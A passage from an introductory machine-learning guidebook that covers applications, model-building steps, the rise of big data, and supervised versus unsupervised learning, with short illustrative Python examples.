program that can run on machine learning. Some of the different industries
that are already using this kind of technology will include financial services,
government, health care, retail, oil and gas, transportation, and more.
Machine learning is a branch of artificial intelligence that allows a
computer to learn, similar to what we see with the human mind. With a
minimal amount of supervision from a person, the machine will
be able to automate a lot of tasks, find the information that you want, and get
to some insights and predictions that you may not be able to find in other
methods on your own. And this guidebook is going to spend some time
looking at how you are able to do this type of machine learning with the help
of the Python coding language so you can start some of your own projects in
no time.
Chapter 2 Applications of Machine Learning
Machine learning helps to change how businesses work and operate in
today’s world. Through machine learning, large volumes of data can be
extracted, which makes it easier for the user to draw some predictions from a
data set.
There are numerous manual tasks that one cannot complete within a
stipulated time frame if the task includes the analysis of large volumes of
data. Machine learning is the solution to such issues. In the modern world, we
are overwhelmed with large volumes of data and information, and there is no
way a human being can process all of it. Therefore, there is a need to
automate such processes, and machine learning helps with that.
When any analysis or discovery is automated fully, it will become easier to
obtain the necessary information from that analysis. This will also help the
engineer automate any future processes. The world of business analytics, data
science, and big data requires machine learning and deep learning. Business
intelligence and predictive learning are no longer restricted to just large
businesses but are accessible to small companies and businesses too. This
allows a small business to utilize the information that it has collected
effectively. This section covers some of the applications of machine learning
in the real world.
Virtual Personal Assistants
Some examples of virtual assistants are Allo, Google Now, Siri and Alexa.
These tools help users access necessary information through voice
commands. All you must do is activate the assistant, and you can ask the
machine any questions you want.
Your personal assistant will look for the necessary information based on your
question, and then provide you with an answer. You can also use this
assistant to perform regular tasks like setting reminders or alarms. Machine
learning is an important part of this tool since it helps the system gather the
necessary information to provide you with an answer.
Density Estimation
Machine learning can help a system estimate the underlying probability
distribution of the data it is given. Once a model has learned how existing
examples are distributed, it can use that distribution to suggest similar items
to users or even to generate new data that resembles the originals. For
example, a model trained on the text of “A Song of Ice and Fire” could learn
the distribution of its words and phrases and generate new text in a similar
style.
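As a small, concrete sketch of density estimation (using invented numeric
data rather than book text), the following pure-Python code estimates a
probability density from observed samples and then draws a new point that
resembles them:

```python
import math
import random

def gaussian_kde(samples, bandwidth):
    """Estimate a probability density by placing a small Gaussian
    'bump' on every observed sample (kernel density estimation)."""
    n = len(samples)
    def density(x):
        total = 0.0
        for s in samples:
            z = (x - s) / bandwidth
            total += math.exp(-0.5 * z * z) / math.sqrt(2 * math.pi)
        return total / (n * bandwidth)
    return density

random.seed(0)
# Invented data: 1,000 measurements clustered around 5.0.
samples = [random.gauss(5.0, 1.0) for _ in range(1000)]
estimate = gaussian_kde(samples, bandwidth=0.4)

# The estimated density is high near the bulk of the data, low far away.
print(estimate(5.0) > estimate(9.0))  # True

# Once the distribution is learned, new data resembling the originals
# can be generated by resampling a point and adding kernel noise.
new_point = random.choice(samples) + random.gauss(0.0, 0.4)
```

Real systems use far richer models than this one-dimensional kernel
estimate, but the principle of learning a distribution and then sampling from
it is the same.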
Latent Variables
When you work with latent variables, the machine will try to identify if these
variables are related to other data points and variables within the data set.
This is a handy method when you use a data set where it is difficult to
identify the relationship between different variables. There are times when
you will be unable to identify why there is a change in a variable. The
engineer can understand the data better if he or she can take a look at the
different latent variables within the data set.
Dimensionality Reduction
The data set that is used to train machines to predict the outcome to any
problem will have some dimensions and variables. If there are over three
dimensions within the data set, it will become impossible for the human mind
to visualize or understand that data. In these situations, it is always good to
have a machine learning model to reduce the volume of the data into smaller
segments that are easily manageable. This will help the user identify the
relationships that exist within the data set.
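As an illustration of the idea (a hand-rolled sketch of the principle behind
techniques such as principal component analysis, not a library routine), the
following code reduces two strongly correlated measurements per sample to a
single coordinate along their principal axis:

```python
import math

# Invented data: each sample has two measurements, with the second
# roughly twice the first, so the data is effectively one-dimensional.
points = [(x, 2.0 * x + 0.1 * (x % 3 - 1)) for x in range(10)]

# Center the data.
mx = sum(p[0] for p in points) / len(points)
my = sum(p[1] for p in points) / len(points)
centered = [(x - mx, y - my) for x, y in points]

# Entries of the 2x2 covariance matrix.
sxx = sum(x * x for x, _ in centered) / len(centered)
syy = sum(y * y for _, y in centered) / len(centered)
sxy = sum(x * y for x, y in centered) / len(centered)

# Angle of the principal axis (closed form for the 2x2 case).
theta = 0.5 * math.atan2(2 * sxy, sxx - syy)
direction = (math.cos(theta), math.sin(theta))

# Each 2-D point is reduced to one coordinate along that axis.
reduced = [x * direction[0] + y * direction[1] for x, y in centered]
print(len(reduced))  # 10 numbers instead of 10 (x, y) pairs
```

Because the two measurements move together, a single number per sample
preserves almost all of the variation in the original data.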
Every machine learning model will ensure that the machine learns from the
data that is provided to it. The machine can then be used to classify data or
predict the outcome or the result for a specific problem. It can also be used in
numerous applications like self-driving cars. Machine learning models help
to improve the ability of smartphones to recognize the user’s face or the way
in which Google Home or Alexa can recognize your accent and voice and
how the accuracy of the machines improves if they have been learning for
longer.
Steps in Building a Machine Learning System
Regardless of the type of model that you are trying to build or the problem
that you are trying to solve, you will follow the steps mentioned in this
section while building a machine learning algorithm.
Define Objective
The first step, as it is with any other task that you perform, is to define the
purpose or the objective you want to accomplish using your system. This is
an important step since the data you will collect, the algorithm you use, and
many other factors depend on this objective.
Collect Data
Once you have your objective in mind, you should collect the required data.
It is a time-consuming process, but it is the next important step that you must
achieve. You should collect the relevant data and ensure that it is the right
data for the problem you are trying to solve.
Prepare Data
This is another important step, but engineers often overlook it. If you do
overlook this step, you will be making a mistake. It is only when the input
data is clean and relevant that you will obtain an accurate result or prediction.
Select Algorithm
Numerous algorithms can be used to solve a problem, including Support
Vector Machines (SVM), k-nearest neighbors, Naive Bayes, Apriori, and
more. You must choose the algorithm that best suits the objective.
Train Model
When your data set is ready, you should feed it into the system and help the
machine learn using the chosen algorithm.
Test Model
When your model is trained, and you believe that it has provided the relevant
results, you can test the accuracy of the model using a test data set.
Predict
The model will perform numerous iterations with the training data set and the
test data set. You can look at the predictions and provide feedback to the
model to help it improve the predictions that it makes.
Deploy
Once you have tested the model and are happy with how it works, you can
serialize that model and integrate it into any application that you want to use.
This means that the model that you have developed can now be deployed.
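The steps above can be sketched end to end in plain Python. This is a toy
illustration with invented, synthetic data and a deliberately simple
nearest-neighbour algorithm, not a production recipe:

```python
import pickle
import random

# 1. Define the objective: predict a label (0 or 1) from two features.
# 2. Collect data: here we synthesize a toy, well-separated data set.
random.seed(1)
data = ([((random.gauss(0, 1), random.gauss(0, 1)), 0) for _ in range(50)]
        + [((random.gauss(4, 1), random.gauss(4, 1)), 1) for _ in range(50)])

# 3. Prepare data: shuffle, then split into training and test sets.
random.shuffle(data)
train, test = data[:80], data[80:]

# 4. Select an algorithm: 1-nearest-neighbour, the simplest possible choice.
def predict(model, point):
    def dist2(p, q):
        return (p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2
    nearest = min(model, key=lambda item: dist2(item[0], point))
    return nearest[1]

# 5. Train the model: for 1-NN, "training" just means storing the examples.
model = train

# 6./7. Test and evaluate the predictions on data the model has never seen.
accuracy = sum(predict(model, x) == y for x, y in test) / len(test)
print("accuracy:", accuracy)

# 8. Deploy: serialize the trained model so another application can load it.
blob = pickle.dumps(model)
restored = pickle.loads(blob)
```

The serialization step at the end uses Python's standard pickle module; in
practice you would also version the model file and monitor its accuracy after
deployment.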
The steps followed will vary depending on the type of application and
algorithm that you are using. You can choose to use a supervised or
unsupervised machine learning algorithm. The steps mentioned in this section
are often the steps followed by most engineers when they are developing a
machine learning algorithm. There are numerous tools and functions that you
can use to build a machine learning model. This book will help you with
understanding more about how you can design a machine learning model
using Python.
Chapter 3 Big Data and Machine Learning
In order to learn something, a system that is capable of machine learning
needs to be exposed to a lot of data. Going back several decades, computers
didn’t have access to all that much data, in comparison to what they can
access today. Computers were slow and quite awkward. Most data at that
time was stored on paper, and so it was not readily accessed by computer
systems. There was also far less of it. Of course, companies and large
businesses, along with governments have always collected as much data as
they could, but when you don’t have that much data and it’s mostly in the
form of paper records, then you don’t have much data that is useful to a
machine learning computer system.
The first databases were invented in the late 1960s. A database is not really
what we think of when considering the relationship between data and
machine learning, although it could be in some circumstances. Databases
collect very organized information. To understand the difference, think about
a collection of Facebook posts, versus a record of someone registering to
enroll at a university. The collection of Facebook posts is going to be
disorganized and messy. It is going to have data of different types, such as
photos, videos, links, and text. It’s going to be pretty well unclassified,
maybe only marked by who posted it and the date.
In contrast, when you say database you should think completely organized
and restricted data. A database is composed of individual records, each record
containing the same data fields. At a university, students when enrolled might
enter their name, social security or ID number, address, and so on.
All of these records are stored in the same format, together in one big file.
The file can then be “queried” to return records that we ask for. For example,
we could have it return records for everyone in the Freshman class.
Relational databases allow you to cross reference information and bring it
together in a query. Following our example, you could have a separate
database that had the courses each student was taking. This could be stored in
a separate database from the basic information of each student, but it could be
cross referenced using a field such as the student ID.
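Python's built-in sqlite3 module makes this easy to try. The table and field
names below are invented for illustration:

```python
import sqlite3

# An in-memory database standing in for the university's record system.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT, year TEXT)")
con.execute("CREATE TABLE enrollments (student_id INTEGER, course TEXT)")

con.executemany("INSERT INTO students VALUES (?, ?, ?)",
                [(1, "Ada", "Freshman"), (2, "Grace", "Sophomore")])
con.executemany("INSERT INTO enrollments VALUES (?, ?)",
                [(1, "Calculus"), (1, "History"), (2, "Physics")])

# A query returning only the Freshman class:
rows = con.execute("SELECT name FROM students WHERE year = 'Freshman'").fetchall()
print(rows)  # [('Ada',)]

# Cross-referencing the two tables through the student ID field:
courses = con.execute(
    "SELECT s.name, e.course FROM students s "
    "JOIN enrollments e ON e.student_id = s.id "
    "WHERE s.name = 'Ada'").fetchall()
print(courses)
```

The JOIN clause is exactly the kind of cross-referencing described above:
two separate tables are pulled together through the shared student ID.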
Tools were developed to help bring data together from different databases.
IBM, a company that always seems to figure large in many developments in
computer science, developed the first structured query language, or SQL,
which could be used to do tasks like this. Once data could be pulled together, it
could be analyzed or used to do things like print out reports for human
operators.
As computers became more ubiquitous, companies and government agencies
began collecting more and more data. But it wasn’t until the late 1990s that
the amount of data and types of data began to explode. There were two
developments that led to these changes. The first was the invention of the
internet. The second was the development of ever improving and lower cost
computer storage capacity.
The development and commercialization of the internet meant that over a
very short time period, nearly everyone was getting “online”. Businesses
moved fast to get online with websites. Those that didn’t fell behind, and
many ended up going out of business. But that isn’t what’s important for our
purposes. The key here is that once people got online, they were leaving data
trails all over the place.
This kind of data collection was increasing in the offline world as well, as
computing power started to grow. For example, grocery stores started
offering so-called discount and membership cards that really functioned to
track what people were buying, so that the companies could make customized
offers to customers, and so they could adjust their marketing plans and so
forth.
The internet also brought the concept of cloud computing to the forefront.
Rather than having a single computer, or a network of computers in one
office, the internet offered the possibility of harnessing the power of multiple
computers linked together both for information processing and doing
calculations and also for simple data storage.
A third development, the continual decline in the costs of storage components
of computer systems along with increased capacity had a large impact in this
area. Soon, more and more data was being collected. Large companies like
Google, and eventually Facebook, also started collecting large amounts of
data on people’s behavior.
This is where the rubber hits the road for machine learning. For the first time, the amounts
of data that machine learning systems needed to be able to perform real world
tasks, not just do things like playing checkers, became possible. Machine
learning systems are trained on data sets, and now businesses (and
governments) had data of all kinds to train machine learning systems to do
many different tasks.
Goals and Applications of Machine Learning
Machine learning is something that can be applied whenever there is a useful
pattern in any large data set. In many cases, it is not known what patterns
exist before the data has been fed to a machine learning system. This is
because human beings are not able to see the underlying pattern in large data
sets, but computers are well suited to finding them. The types of patterns are
not limited in any way. For example, a machine learning system can be used
to detect hacking attempts on a computer network. It can be trained for
network security by feeding the system past data that includes previous
hacking attempts.
In another case, a machine learning system can be used to develop facial
recognition technology. The system can be presented with large numbers of
photographs that contain faces, so that it can learn to spot faces, and to
associate a given face with a particular individual.
Now let’s consider another application of machine learning, which is
completely different from the other two we’ve looked at so far. Machine
learning can be used to approve or disapprove a loan application. During the
training phase, the system will be exposed to a large number of previous loan
applications and the ultimate results. In other words, did the borrower pay the
loan off early or default on the loan? During the exposure to all the data, the
system will learn what characteristics or combinations of characteristics best
predict whether or not a given applicant is going to default on a loan. This is
all done without human input, and so the machine may find patterns in the
data that human observers missed and never suspected were there. The fact is
that human minds are not very good at being able to analyze large data sets,
and some would probably argue that we can’t do it at all.
One of the earliest applications of machine learning was in the detection of
email spam. This is a good example to look at, because it illustrates a
particular type of problem that machine learning systems are good at solving.
Determining whether or not an email is spam or not is something that can be
framed as a classification problem. In other words, you take each email,
examine it, and classify it as spam or not spam. This is not something that can
be taken to be absolute, and detecting all spam messages can be tricky.
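A tiny sketch of this classification idea, using a hand-rolled Naive Bayes
classifier on an invented six-message corpus (real spam filters are trained
on vastly more data and features):

```python
import math
from collections import Counter

# Invented training corpus: (message, label) pairs.
train = [
    ("win free money now", "spam"),
    ("free prize claim now", "spam"),
    ("claim your free money", "spam"),
    ("meeting moved to monday", "ham"),
    ("lunch on monday", "ham"),
    ("notes from the meeting", "ham"),
]

# The "learning" step: count how often each word appears in each class.
word_counts = {"spam": Counter(), "ham": Counter()}
class_counts = Counter()
for text, label in train:
    class_counts[label] += 1
    word_counts[label].update(text.lower().split())

vocab = set(word_counts["spam"]) | set(word_counts["ham"])

def classify(text):
    """Naive Bayes with add-one smoothing: pick the more likely class."""
    scores = {}
    for label in ("spam", "ham"):
        total = sum(word_counts[label].values())
        score = math.log(class_counts[label] / len(train))
        for word in text.lower().split():
            # Add-one smoothing avoids zero probability for unseen words.
            score += math.log((word_counts[label][word] + 1)
                              / (total + len(vocab)))
        scores[label] = score
    return max(scores, key=scores.get)

print(classify("free money prize"))     # spam
print(classify("monday meeting notes")) # ham
```

The model never sees a rule like "messages containing 'free money' are
spam"; it derives that pattern from the word counts, which is exactly the
classification framing described above.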
Fraud detection with credit and debit cards is yet another application of
machine learning. By studying past data, the system can learn to detect
patterns in usage that indicate that the card is being used in a fraudulent
manner. In many cases, the patterns that are detected are going to be things
that human observers are completely unaware of, or wouldn’t associate with
fraud detection even if they knew the patterns existed.
So, we see that machine learning can be applied in virtually any situation
where there is a large amount of data available, and there are patterns in the
data that can be used for the purposes of detection or prediction. Machine
learning is quite general, able to learn anything from playing chess to spotting
fuel waste for an airline like Southwest. This is not the artificial intelligence
that was once imagined by science fiction writers in the 1960s or 1970s, but it
does have many characteristics of human learning. The first is that it’s quite
general. The second is that it will perform better, the more data that it is
exposed to.
Now let’s consider the goals of machine learning. The central goal of
machine learning is to develop general purpose algorithms that can solve
problems using intelligence and learning.
Obviously one important goal of machine learning is to increase productivity.
This is true whether or not the user of the system is a business, a military
branch, or a government agency.
The second goal is to replace human labor with better machine labor. Of
course, this has been a goal of technology ever since the industrial revolution
started, and it continues to be an important goal today. However, the way that
this is being done in the case of machine learning is a little bit different. The
first thing is using machine learning to perform tasks that require a level of
attention and focus that human beings are not able to provide. Even when
humans are excellent workers who will provide maximum focus, a human
suffers from many flaws, like fatigue, and the ability to be distracted. Also,
the amount of information that a human observer can pay attention to at any
given time is very limited. Consider a machine learning system instead–focus
is never an issue. A computer system is able to generate laser-like focus in a
way that a human being never could. Second, it is able to analyze and sample
a far larger data set, and of course it will never be subject to fatigue and it’s
not going to need restroom breaks or lunch.
One application–in a general sense–that is being used in many businesses
today is using machine learning to spot waste. Several large corporations
have already had great success with this. We’ve already mentioned one,
Southwest Airlines famously used machine learning to analyze the activity of
airlines on the tarmac, and they found a great deal of waste in terms of time
and fuel was spent by planes idling on the tarmac. UPS has also used
machine learning to spot wasteful driving routes that cost the company time
and money, at the expense of having thousands of trucks waste gallons of
fuel. Machine learning can also be applied to find out what employees are
doing and how they can better use their time.
Benefits of Machine Learning
There are a large number of benefits for businesses that use machine learning.
We can summarize a few of them here:
1. Machine learning can easily find patterns in any underlying data
set.
2. Systems based on machine learning get better with experience. The
more data they see, the better they are going to get.
3. Machine learning is quite general, and can be applied to nearly any
application, from detecting hacking attempts on a computer
network to picking winning stocks.
4. Machine learning systems can handle multidimensional problems
that would overwhelm human observers.
5. Once a system has gone through the learning phase, further human
intervention is not required. This is a true system that uses
automation.
6. Machine learning can be applied across a broad spectrum, and it
can be used to solve nearly any problem that a business may
encounter.
How Machine Learning Works
Machine learning begins with a human guide in the form of a data scientist. A
problem has to be identified that a machine learning algorithm can be used to
solve. In order for the process to work, there must be a significant amount
of data that can be used to train the system before it is deployed in the real
world. There are two basic ways that machine learning can proceed. They are
called supervised and unsupervised learning.
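The difference can be seen in a few lines of code. In this toy sketch with
invented one-dimensional data, the same measurements are handled both ways:
once with labels provided (supervised), and once where a minimal 2-means
clustering must discover the two groups on its own (unsupervised):

```python
import random

random.seed(2)
# The same measurements, drawn from two distinct groups.
values = ([random.gauss(0, 0.5) for _ in range(30)]
          + [random.gauss(10, 0.5) for _ in range(30)])
labels = [0] * 30 + [1] * 30

# --- Supervised: labels are given, so learn a decision rule from them. ---
mean0 = sum(v for v, l in zip(values, labels) if l == 0) / 30
mean1 = sum(v for v, l in zip(values, labels) if l == 1) / 30
threshold = (mean0 + mean1) / 2  # classify by the nearest class mean

# --- Unsupervised: no labels, so let the data group itself (2-means). ---
c0, c1 = min(values), max(values)
for _ in range(10):
    group0 = [v for v in values if abs(v - c0) <= abs(v - c1)]
    group1 = [v for v in values if abs(v - c0) > abs(v - c1)]
    c0 = sum(group0) / len(group0)
    c1 = sum(group1) / len(group1)

# Both approaches recover essentially the same boundary between groups.
print(round(threshold, 1), round((c0 + c1) / 2, 1))
```

With well-separated data the two approaches agree; the practical difference
is that the supervised version needed someone to label every training point,
while the unsupervised version did not.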
In the training phase, the data scientist will select appropriate training data,
and expose the system to the data. As the system is exposed to data, it will
modify itself in order to become more accurate. This phase is a crucial part of
the development of the system, and the data scientist must choose the right
data set for the problem at hand. In other words, the impression that human
beings are not involved at all is completely false. Human beings are involved
in choosing and framing the problem, and in choosing the right training data.
The human being is also involved in the process of evaluating the
performance of the system. As we will see, there are tradeoffs that must be
made that have large implications for the viability of the system. If the data
scientists that are working on the problem are not careful and correct, to the
best of their abilities, in interpreting the results produced by the system, a
dysfunctional system can be deployed that will err when attempting to do its
job.
The training phase may have several iterations, depending on how the results
turn out.
Once the system is deployed, it will more or less operate in an autonomous
fashion, but data scientists that are involved in this work should be
continually evaluating the performance of the system. At some point, the
system may need to be replaced or it may need to be subjected to more
training, if it is not producing the kinds of results that are accepted.
Steps in Machine Learning
The data scientist must follow a certain procedure in order to implement
machine learning. We will learn the two different approaches that are used in
“training” the system. Machine learning involves artificial intelligence, and
so any system that has artificial intelligence is just like a human being, in that
the system needs to learn its skill before it goes out into the real world. It is
up to the data scientist to provide the training that the system needs.
Define the Problem
Each step in the machine learning paradigm is critical. If you make a mistake
early on, it is going to make the entire enterprise fall flat. When you say
artificial intelligence, you may get the impression of an all-powerful
computer, like the HAL 9000 system from 2001: A Space Odyssey, but the
reality is a little more down to earth.
It is true that there is not a specific, line by line set of instructions written in
code by human engineers that tell the computer what to do, and once a
machine learning system is deployed people might not really understand how
it’s working. Nonetheless, there is a lot of direct human involvement in the
process. And given our propensity to make mistakes, it’s important to be
careful at each step along the way. Think of yourself as a teacher guiding a
child so that they learn a new skill.
The first step is having a clear definition of the problem that you are facing.
The end goal must be in mind, so you must know what you expect the
machine learning system to do when it is up and running.
Gather and Prepare Data
The second step is to gather the data that is necessary to use in order to train
the system. If you define the problem but there is little or no data that can be
used to train it, then this procedure is not going to work. Machine learning
must have enough data so that the system can determine patterns and
relationships in the data that will allow it to make predictions and
classifications in the real world.
The assumption is going to be that enough data of the right type has been
collected. But simply having the data is not enough. As we will see, if you
simply feed the system raw data, this can create problems for a number of
reasons. So you will have to take a look at the data and apply some human
judgment to it. Think of data as consisting of a large number of fields or
properties. Are all of the properties relevant to the problem at hand?
In many cases, a machine learning system is going to find relationships
among different properties that do have predictive value that humans would
miss, so there is a balancing act between cutting down the data and
removing something that might be very important, even though it doesn't
seem relevant to the human operator.
Nonetheless, you don’t want to have too much information in the data set that
can make it impossible to learn. So, you might have to discard some data to
reduce the complexity of the problem, if this is possible.
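As a small sketch of this trimming step, here is how an irrelevant property might be dropped with pandas. The column names and values are invented for illustration, not taken from any real data set:

```python
import pandas as pd

# Hypothetical raw data: not every column is relevant to the problem at hand.
raw = pd.DataFrame({
    "age": [25, 32, 47, 51],
    "income": [40000, 52000, 81000, 90000],
    "customer_id": [101, 102, 103, 104],   # an identifier, not a predictive feature
    "favorite_color": ["red", "blue", "green", "red"],
})

# Keep only the properties we judge relevant, discarding the rest
# to reduce the complexity of the problem.
features = raw.drop(columns=["customer_id"])
print(features.columns.tolist())   # → ['age', 'income', 'favorite_color']
```

Deciding which columns to drop is exactly the human judgment call described above; the code only carries out the decision.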
Choose the Style of Learning
The style of learning is going to be based on the nature of the problem and
the type of data that you have, which makes this an easy step: the problem
and the data will dictate the style used. The main types of learning are supervised learning,
unsupervised learning, semi-supervised learning, and representational
learning. We will learn what types of problems each type of learning is
suitable for and how the structure of the input data differs.
Select the Most Appropriate Algorithm
Once you have settled on whether the data and the problem you are
solving are best suited for supervised or unsupervised learning, you need
to decide which algorithm to use. Certain situations might dictate whether
one algorithm is better than another algorithm. Choosing the right algorithm
might have an influence on the types of errors that you see in the results.
This means that as someone who is using machine learning, understanding
the main types of algorithms is going to be important.

Train and Test
Now at this point, everything is ready to go. The first step is to expose the
system to the training data so that it can learn. Then you will test the system
and evaluate.
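As a rough sketch of this step, the following uses scikit-learn's built-in iris data set and a k-nearest-neighbors classifier. The particular data set and algorithm are arbitrary choices for illustration, not a recommendation:

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier

# Load a small built-in data set and split it into training and test portions.
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=0)

# Expose the system to the training data so that it can learn...
model = KNeighborsClassifier(n_neighbors=3)
model.fit(X_train, y_train)

# ...then test the system on data it has never seen and evaluate.
accuracy = model.score(X_test, y_test)
print(f"test accuracy: {accuracy:.2f}")
```

The accuracy number produced here is exactly the kind of quantified error the Improve step below works with.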
Improve
When you evaluate the performance of the system with training and test data,
the error will need to be quantified. If the error is not acceptable, adjustments
may have to be made. As you would with regular coding, you can go through
a cycle of more training and making adjustments to reduce errors. In some
cases, you might have to scrap the system and start over, but one of the
benefits of machine learning is that the system is adaptive. The more data it
sees, the better it learns. So, improvement may be possible by simply
exposing the system to more training data.
Deploy
Once the system is working to the degree that has an acceptable level of
error, then it is ready to be deployed.
Chapter 4 Types Of Machine Learning

In a world soaked in artificial intelligence, it is interesting to understand
machine learning in depth. This is a concept that allows an algorithm to
perform specific tasks without relying on any explicit instructions. Instead,
the machine relies on inference and patterns such that the user feeds data to a
generic algorithm rather than writing the code. In response, the machine
constructs the logic based on the input data. Usually, the accuracy of the
prediction made by the algorithm is evaluated and the algorithm only gets
deployed when the precision is acceptable.
Types of Machine Learning
There are three broad categories of machine learning. We will discuss each of
them in detail below.

1. Supervised Learning
This paradigm happens to be the most popular, probably because it is easy to
comprehend and execute. Here, the algorithm creates a mathematical model
from a labeled dataset, i.e., a dataset containing both the input and output
parameters. This dataset acts as a trainer to the model. Taking an example, we
may decide to use the algorithm to determine whether a particular image
contains a certain object. In this case, the dataset would comprise images with
and without that object, with every image carrying an output label
designating whether or not it contains the object. At first, the algorithm
may predict any answer, right or wrong; after several training passes,
however, it learns to pick out only the images containing the object.
Once it is fully trained, the algorithm starts making right predictions even
when new data is input. A perfect example of a supervised learning model is
a support vector machine. On the diagram below, the support vector machine
divides data into sections separated by a linear boundary. You realize the
boundary separates the white circles from the black.
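A minimal sketch of such a support vector machine with scikit-learn follows, using a handful of made-up two-dimensional points in place of the figure's white and black circles:

```python
import numpy as np
from sklearn.svm import SVC

# Two groups of labeled points that are linearly separable,
# standing in for the white and black circles of the figure.
X = np.array([[1.0, 1.0], [1.5, 2.0], [2.0, 1.5],    # class 0
              [6.0, 6.0], [6.5, 7.0], [7.0, 6.5]])   # class 1
y = np.array([0, 0, 0, 1, 1, 1])

# A support vector machine with a linear kernel finds the boundary
# that separates the two labeled groups.
clf = SVC(kernel="linear")
clf.fit(X, y)

# A new point near the first group falls on that side of the boundary.
print(clf.predict([[2.0, 2.0]]))   # → [0]
```

Once trained, the model makes right predictions even on new data it has never seen, which is the behavior described above.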

Types of Supervised Learning
Classification: These algorithms are used in instances where the
outputs are limited to discrete values. In the case of filtering emails, for
example, an incoming mail is the input, whereas
the output is the name of the folder it is sorted into.
Regression: This is the algorithm under which the output has a
continuous value, which means it may take any value within a
given range. Perfect examples include temperature, wind speed, and the
price of a commodity.
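A small sketch of the regression case follows, using a hypothetical linear relationship between wind speed and power output (the numbers are invented so the fit comes out clean):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

# Hypothetical data: wind speed (input) vs. power output (continuous output).
X = np.array([[5], [10], [15], [20]])      # wind speed
y = np.array([50.0, 100.0, 150.0, 200.0])  # a continuous value, not a class label

reg = LinearRegression().fit(X, y)

# Unlike a classifier, the regressor can predict any value in the range,
# not just one of a fixed set of labels.
print(round(reg.predict([[12]])[0], 1))    # → 120.0
```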
Supervised machine learning is exhibited in many common applications,
some of which we have discussed below.
➢ Advertisement Status: Most of the ads that you encounter when
browsing the internet are positioned there because a supervised learning
algorithm vouched for their clickability and popularity.
➢ Face Recognition: This one is quite common on Facebook. It is very
likely that your face has been used in a supervised algorithm that is trained to
recognize it. When Facebook suggests a tag, you may have noticed that the
system guesses the people in the photo, which is a supervised process.
➢ Spam Classification: The spam filter that you find on your modern
email system is a supervised learning concept. Apart from preemptively
filtering malicious emails, the system also allows the user to provide new
labels and express their preferences. See the illustration on the figure below.
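A toy sketch of such a spam filter can be built with scikit-learn's naive Bayes classifier. The hand-labeled messages below are invented for illustration; a real filter trains on far more data:

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB

# A few invented, hand-labeled training messages.
mails = ["win money now", "cheap prize win",
         "meeting at noon", "lunch tomorrow noon"]
labels = ["spam", "spam", "inbox", "inbox"]

# Turn the text into word counts, then train the classifier on the labels.
vec = CountVectorizer()
X = vec.fit_transform(mails)
clf = MultinomialNB().fit(X, labels)

# The trained filter assigns a folder name (the output) to an incoming mail.
print(clf.predict(vec.transform(["win a cheap prize"]))[0])   # → spam
```

The user correcting a label, as described above, simply becomes another training example for the next round of fitting.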
2. Unsupervised Learning
As the name suggests, unsupervised machine learning is the exact opposite of
supervised learning. The model finds structures in the data and also learns
through observation. When given a dataset, the model automatically finds
relationships and patterns by creating clusters in the dataset. The paradigm
cannot add labels to the created cluster, but it does the creation perfectly. This
means that if we have a set of apples and oranges, the model will separate the
apples from the oranges, but will not say that this is a set of oranges or
apples.
Now, suppose we had more than two sets, say we present images of grapes,
oranges, and apples. As explained above, the model, based on some
relationships and patterns, will create clusters and separate the datasets into
those clusters. Whenever new data is input, the model adds it to one of the
already built clusters as shown in the figure below. You realize the output is
grouped perfectly even without addition of labels.
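A minimal sketch of this behavior uses scikit-learn's KMeans, with invented fruit measurements (say, weight in grams and diameter in centimeters) as the unlabeled input:

```python
import numpy as np
from sklearn.cluster import KMeans

# Unlabeled measurements of three kinds of fruit (hypothetical values).
X = np.array([[5, 2], [6, 2],        # grape-sized
              [90, 7], [95, 8],      # orange-sized
              [150, 8], [160, 9]])   # apple-sized

# The model groups the data into clusters on its own; it never learns
# the names "grapes", "oranges", or "apples".
km = KMeans(n_clusters=3, n_init=10, random_state=0).fit(X)

# A new, unseen fruit is assigned to one of the already built clusters.
same_cluster = km.predict([[92, 7]])[0] == km.predict([[95, 8]])[0]
print(same_cluster)   # → True
```

Note that the output is just a cluster number; attaching a human-readable label to each cluster is exactly what the paradigm cannot do by itself.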
Let us take another classical example for better understanding. Think of a
little baby and his family dog. The baby knows the dog's features very well.
When a family friend brings along another dog to play with the baby, the
baby will identify it as a dog even without anyone telling them. They will
easily classify it because it has familiar features: two eyes, two ears, four
legs, and so on. This falls under unsupervised learning because the baby
classifies the input data without being taught. If it were supervised learning,
the family friend would have to tell the baby that it's a dog.
Types of Unsupervised Learning
Clustering: This concept identifies a pattern in an assortment of
unclassified data. Clustering algorithms categorize any natural
groups that exist in the data. The user is also at liberty to adjust the number
of clusters they want their algorithm to identify. Under clustering there
are several subtypes that you can utilize:
❖ Exclusive (partitioning)
Under this type, data is classified such that each data point can only
belong to a single cluster. K-means serves as a perfect example.

❖ Agglomerative
This is the technique where every data point starts out as its own group. The
number of clusters is reduced by iterative mergers between the two closest
groups. Hierarchical clustering is an example.
❖ Overlapping
Under this technique, each data point is associated with a membership value.
Fuzzy sets are used in grouping data, and each point could fit into two or
more groups with different membership degrees. Fuzzy C-Means is a suitable
example of this type.
❖ Probabilistic
This concept creates clusters using probability distributions. Consider the
following keywords:

“Men’s pants”
“Ladies’ pants”
“Men’s wallets”
“Ladies’ wallets”
The given keywords could be grouped into two; “pants” and “wallets” or
“Men” and “Ladies”.
Association
Association rules allow the user to establish associations among data objects
inside large databases. As the name suggests, the technique seeks to discover
interesting relations between variables contained in large databases. For
instance, shoppers could be grouped based on their search and purchase
histories.

Applications of Unsupervised Machine Learning
Unsupervised ML is based on data and its attributes, and therefore we can
conclude that it is data-driven. The results of a task are shaped by the
way in which the data is formatted. Some of the common areas that rely on
unsupervised learning include, but are not limited to:
➢ Buying Habits: It is not surprising to find your purchasing habits
stored in a database somewhere. The information could be used by marketers
to group clients into similar shopping segments so that they can reach out to
them easily. The clustering is easy to do under unsupervised learning
algorithms.
➢ Recommender Systems: If you are a Netflix or YouTube user you
have probably encountered video recommendations many times. Often these
systems fall within the unsupervised domain. The system knows the
watch history of its users. The model uses the history to identify relationships
between users who enjoy watching videos of certain genres, length, etc, and
prompt them with a suggestion of related videos that they may not have
watched.
➢ Identification of Fraudulent Transactions: Anomaly detection is the
technique used to discover abnormal data points. The algorithm picks out
any unusual points within the data set and raises an alarm.
